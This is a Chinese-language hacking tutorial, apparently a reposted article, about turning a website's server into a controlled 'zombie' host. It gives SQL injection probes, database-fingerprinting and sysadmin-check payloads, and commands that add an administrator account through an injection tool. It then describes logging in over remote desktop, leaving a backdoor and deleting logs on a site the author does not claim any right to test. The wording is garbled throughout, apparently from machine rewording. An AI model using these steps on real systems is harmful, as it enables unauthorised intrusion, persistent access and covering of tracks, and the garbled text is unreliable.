摘要:即使捕捉了菜鸟的肉鸡,品质也往往比拟差,最多也可以做DDoS肉鸡,笔者倡导,假设用来学习操作或许钻研,还是捕捉主机肉鸡比拟好,由于它稳固、24小时在线、速度快……好处不计其数,上方笔者就带大家对一个站点启动测试,本文旨在抛砖引玉,宿愿与大家启动技术交
即使捕捉了菜鸟的肉鸡,品质也往往比拟差,最多也可以做DDoS肉鸡。笔者倡导,假设用来学习操作或许钻研,还是捕捉主机肉鸡比拟好,由于它稳固、24小时在线、速度快……好处不计其数。上方笔者就带大家对一个站点启动测试。本文旨在抛砖引玉,宿愿与大家启动技术交换。1.例如为咱们要测试的中央(为了不用要的费事,地址用xxx来替代)。检测注入破绽是在网址后输入“AND 1=1”反常页面或“AND 1=2”不反常页面。发现破绽的环节我想大家都知道,这里就不多说了。2.接着咱们来判别数据库的类型。在地址前面输入:and (select count(*) from sysobjects)>0 也就是:and (select count(*) from sysobjects)>0。3.从图1中可以看到页面反常前往!接着在地址上输入:and (select count(*) from msysobjects)>0。咱们来看一下前往的状况,如图2所示。
4.这样,咱们可以判别,该数据库是SQL Server。上方,在地址前面输入这条命令:and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。wWw.itcOmpUTEr.cOM.cN5.这是判别读写权限,页面反常前往,如图3所示。晕,居然是SA权限。拿出NB 联盟注入工具来测试吧。操作比输入代码要便捷,也比拟易懂。
6.在注上天址里填上要注入的地址,在上方的DOS 命令中输入“net user”查问账户(图4)。
7.接着,输入“net user hsmw hsmw / add”参与 一个名字为 “hsmw”的账号(图5),再输入“net localgroup administrators hsmw /add”把刚刚参与的hsmw 这个账号(图6),优化为治理员权限。
8.来看参与的成果。输入“net user”,咱们可以看到,多了一个 hsmw的 账号。这说明参与账号完成了(图7)。
9.再启动便捷的扫描,看看开了3389端口没有。太“可怜”了,居然开了3389。哈哈,间接用咱们刚刚参与的账号登录,而后留后门并删除日志。撤!
From: